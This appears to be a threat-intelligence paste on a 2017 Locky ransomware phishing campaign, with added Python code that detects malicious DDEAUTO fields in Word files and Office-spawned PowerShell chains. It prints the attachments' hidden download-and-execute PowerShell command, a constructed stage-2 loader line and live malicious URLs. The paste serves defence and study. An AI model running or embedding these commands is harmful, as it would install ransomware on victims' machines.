2017-10-19 Locky "Document / Invoice / Paper"

Racco42, Oct 19th, 2017 (edited)
2017-10-19: #locky email phishing campaign "Document / Documents / Invoice / Order / Paper / Receipt / Scan"

Email sample:
-------------------------------------------------------------------------------------------------------------------------
From: Jayne <Jayne.800@[REDACTED]>
To: [REDACTED]
Subject: Receipt
Date: Tue, 24 Oct 2017 02:16:24 +0200

Attachment: DC000901.doc
-------------------------------------------------------------------------------------------------------------------------
- the sender address is forged to appear to come from the same domain as the recipient
- the subject is one of "Document", "Documents", "Invoice", "Order", "Paper", "Receipt", "Scan", "Scanned document" or "DC000<3-5 digits>.doc"
- the email body is empty
- the attached file "DC000<3-5 digits>.doc" is an MS Word document abusing the DDEAUTO field feature (a legitimate Word field, not a code-execution exploit; Word prompts the user before updating the field and before starting the application, but the prompts are easily clicked through). When the field is updated it tries to run the following command:

C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://pdj.co.id/hjergf76');powershell -e $e "

The command downloads a second, base64-encoded PowerShell script from one of the following locations and passes it to "powershell -e":
http://accessyouraudience.com/hjergf76
http://missinglynxsystems.com/hjergf76
http://pdj.co.id/hjergf76
http://pragmaticinquiry.org/hjergf76
http://vithos.de/hjergf76

The secondary script downloads the malware (the loader listed below) from one of the download sites and executes it.
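Added example (not the paste author's tooling): a Python scanner that pulls the DDE/DDEAUTO field instruction out of a Word document and reports the shell it launches, the hidden-window switch, the download cradle and the URLs, so the command above can be recovered from an attachment without opening it in Word. It handles the binary .doc text stream (8-bit or UTF-16LE, at either byte alignment) and the docx case where Word splits the instruction over several instrText runs. The samples are constructed from the command quoted above; the minimal docx builder, the field names in the report and the heuristics are my assumptions, not anything from the paste.

```python
"""Pull DDE/DDEAUTO field instructions out of Word documents and summarise what
they would run. Added example, not the paste author's tooling; the samples are
constructed from the command quoted above and nothing is executed or fetched."""
import html
import io
import re
import zipfile
from xml.sax.saxutils import escape

# A field instruction: 'DDE' or 'DDEAUTO' up to the next field mark (0x13/0x14/0x15
# in a .doc text stream), line break or '<'. The length cap is a sanity guard.
DDE_RE = re.compile(r'\bDDE(?:AUTO)?\b[^\x13\x14\x15\r\n<]{1,4000}', re.IGNORECASE)
URL_RE = re.compile(r'''https?://[^\s'"();]+''', re.IGNORECASE)
# docx field markup: fldChar begin/separate/end, instrText runs, single-tag fldSimple.
FLD_RE = re.compile(
    rb'<w:fldChar\b[^>]*?w:fldCharType="(\w+)"[^>]*>'
    rb'|<w:instrText\b[^>]*>(.*?)</w:instrText>'
    rb'|<w:fldSimple\b[^>]*?w:instr="([^"]*)"', re.S)
SHELL_HINTS = ('cmd.exe', 'powershell', 'mshta', 'rundll32', 'regsvr32', 'wscript', 'cscript')

def _text_views(data):
    """8-bit and UTF-16LE (both byte alignments) decodings of a binary .doc blob."""
    yield data.decode('latin-1')
    for off in (0, 1):
        chunk = data[off:]
        yield chunk[:len(chunk) - len(chunk) % 2].decode('utf-16-le', errors='replace')

def _docx_fields(xml):
    """Reassemble instructions that Word spread over several w:instrText runs."""
    fields, cur = [], None
    for m in FLD_RE.finditer(xml):
        kind, piece, simple = m.groups()
        if simple is not None:                      # <w:fldSimple w:instr="...">
            fields.append(html.unescape(simple.decode('utf-8', 'replace')))
        elif kind == b'begin':
            cur = []
        elif kind in (b'separate', b'end'):         # instruction text is complete
            if cur:
                fields.append(html.unescape(''.join(cur)))
            cur = None
        elif piece is not None and cur is not None:
            cur.append(piece.decode('utf-8', 'replace'))
    return fields

def find_dde_fields(data):
    """Distinct, whitespace-normalised DDE/DDEAUTO instructions in a .doc or .docx blob."""
    if data[:2] == b'PK':  # OOXML zip container
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            views = _docx_fields(z.read('word/document.xml'))
    else:
        views = list(_text_views(data))
    found = []
    for text in views:
        for m in DDE_RE.finditer(text):
            instr = ' '.join(m.group(0).split())
            if instr not in found:
                found.append(instr)
    return found

def analyze(data):
    """One report per DDE field: shell launched, hidden window, download cradle, URLs."""
    report = []
    for instr in find_dde_fields(data):
        low = instr.lower()
        report.append({
            'field': instr,
            'launches_shell': any(h in low for h in SHELL_HINTS),
            'hidden_window': re.search(r'-w(?:indowstyle)?\s+hidden', low) is not None,
            'downloads': 'downloadstring' in low or 'downloadfile' in low,
            'urls': URL_RE.findall(instr),
        })
    return report

def build_docx(instr_pieces):
    """Constructed minimal .docx with one DDEAUTO field split over several instrText runs."""
    runs = ''.join(f'<w:r><w:instrText xml:space="preserve">{escape(p)}</w:instrText></w:r>'
                   for p in instr_pieces)
    xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           '<w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
           '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Receipt</w:t></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml', '<Types/>')  # real files carry more parts
        z.writestr('word/document.xml', xml)
    return buf.getvalue()

# The field instruction as the paste quotes it (doubled backslashes are field syntax).
PASTE_INSTR = (
    'DDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden '
    "$e=(New-Object System.Net.WebClient).DownloadString('http://pdj.co.id/hjergf76');"
    'powershell -e $e "'
)
# Constructed stand-ins: .doc text stream in 8-bit and odd-aligned UTF-16LE, and a .docx.
SAMPLE_DOC_8BIT = ('Receipt \x13 ' + PASTE_INSTR + ' \x14Receipt\x15 ').encode('latin-1')
SAMPLE_DOC_UTF16 = b'\x00' + ('\x13 ' + PASTE_INSTR + ' \x14Receipt\x15').encode('utf-16-le')
SAMPLE_DOCX = build_docx([PASTE_INSTR[:40], PASTE_INSTR[40:95], PASTE_INSTR[95:]])
```

For a real .doc, run it on the extracted WordDocument stream (e.g. via olefile) rather than the whole OLE container, since the piece table can fragment the text and split the instruction; for docx, headers, footers and settings.xml can carry fields too, so scan those parts as well as document.xml.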

Download sites (the stage-2 script fetches the loader from one of these):
http://deltasec.net/jnoiuy876g
http://pac-provider.com/jnoiuy876g
http://arkberg-design.fi/jnoiuy876g
http://basedow-bilder.de/jnoiuy876g
http://hair-select.jp/jnoiuy876g

Malware (loader):
- SHA256: 3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2, MD5: a633ccbf2a9d299a06512319a0286777
- VT: https://www.virustotal.com/en/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/1508450647/
- HA: https://www.hybrid-analysis.com/sample/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2?environmentId=100
- POSTs information to http://gdiscoun.org
- loads the ransomware payload

Malware:
- Locky ransomware, offline variant (".asasin" extension)
- downloaded by the loader from https://axtes.com/SLyhe6.enc
- hashes of the encoded file as downloaded (.enc): SHA256: ca4c7f0aaf3410497f9b4db1081ecaf5edfebf5acd69df88b975207bbaccfa5e, MD5: f2d1bbb9c5e9907434bcaa725861d847
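Added example (not from the paste): detection logic for the process chain the DDEAUTO command above produces, run over constructed process-creation records. It flags an Office parent spawning cmd.exe or powershell.exe, the -NoP/-NonI/-w hidden switches, a download cradle in the command line, and decodes the base64 UTF-16LE script behind "powershell -e" so that the stage-2 download URL lands in the alert. The records, their tab-separated format and the stage-2 script are constructed stand-ins (the real second stage is not on this page; the stand-in only borrows a URL from the download-site list), and the alert threshold of two reasons is my choice.

```python
"""Triage process-creation telemetry for the Word, cmd.exe, powershell.exe chain
above and decode the 'powershell -e' stage. Added example, not the paste author's
tooling; the records and the stage-2 script below are constructed, not captured."""
import base64
import re

OFFICE = ('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe')
SHELLS = ('cmd.exe', 'powershell.exe')
# PowerShell switches used in the paste's command, matched on their unambiguous prefixes.
SWITCHES = {
    'noprofile': r'-nop(?:rofile)?\b',
    'noninteractive': r'-noni(?:nteractive)?\b',
    'hidden window': r'-w(?:indowstyle)?\s+hidden\b',
    'encoded command': r'-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}',
}
ENC_RE = re.compile(r'-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})', re.I)
CRADLE_RE = re.compile(r'downloadstring|downloadfile|invoke-webrequest|net\.webclient', re.I)
URL_RE = re.compile(r'''https?://[^\s'"();]+''', re.I)

def parse_event(line):
    """Parse one constructed tab-separated Key=Value process-creation record."""
    return dict(kv.split('=', 1) for kv in line.rstrip('\n').split('\t') if '=' in kv)

def decode_encoded_command(cmdline):
    """Script behind -e/-enc/-EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None

def assess(event):
    """Score one event: parent/child chain, suspicious switches, download cradle, URLs."""
    image = event.get('Image', '').lower().rsplit('\\', 1)[-1]
    parent = event.get('ParentImage', '').lower().rsplit('\\', 1)[-1]
    cmd = event.get('CommandLine', '')
    reasons = []
    if parent in OFFICE and image in SHELLS:
        reasons.append(f'{parent} spawned {image}')
    reasons += [name for name, pat in SWITCHES.items() if re.search(pat, cmd, re.I)]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + '\n' + decoded   # scan the decoded stage too
    if CRADLE_RE.search(text):
        reasons.append('download cradle')
    return {'image': image, 'reasons': reasons, 'urls': URL_RE.findall(text),
            'decoded': decoded, 'alert': len(reasons) >= 2}

def scan(lines):
    """Return the assessments that crossed the alert threshold, in log order."""
    return [r for r in (assess(parse_event(l)) for l in lines) if r['alert']]

# Constructed stand-in for the downloaded second stage (only the URL comes from the
# paste's download-site list); the real script was not captured here.
STAGE2_SCRIPT = ("$u='http://deltasec.net/jnoiuy876g';$p=$env:TEMP+'\\a.exe';"
                 "(New-Object System.Net.WebClient).DownloadFile($u,$p);Start-Process $p")
STAGE2_B64 = base64.b64encode(STAGE2_SCRIPT.encode('utf-16-le')).decode('ascii')
STAGE1 = ('powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient)'
          ".DownloadString('http://pdj.co.id/hjergf76');powershell -e $e")
WINWORD = 'C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE'
CMD = 'C:\\Windows\\System32\\cmd.exe'
PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
SAMPLE_EVENTS = [  # constructed records in Sysmon-style fields, not a real capture
    f'Image={CMD}\tParentImage={WINWORD}\tCommandLine="{CMD}" "/k {STAGE1} "',
    f'Image={PS}\tParentImage={CMD}\tCommandLine={STAGE1}',
    f'Image={PS}\tParentImage={PS}\tCommandLine=powershell -e {STAGE2_B64}',
    f'Image=C:\\Windows\\System32\\notepad.exe\tParentImage=C:\\Windows\\explorer.exe'
    f'\tCommandLine=notepad.exe C:\\Users\\me\\notes.txt',
]
```

The third record is the one that matters for blocking: the first two only show the stage-1 URL, while decoding the -e argument exposes the download site the loader actually comes from, which is what you want to add to the proxy deny list.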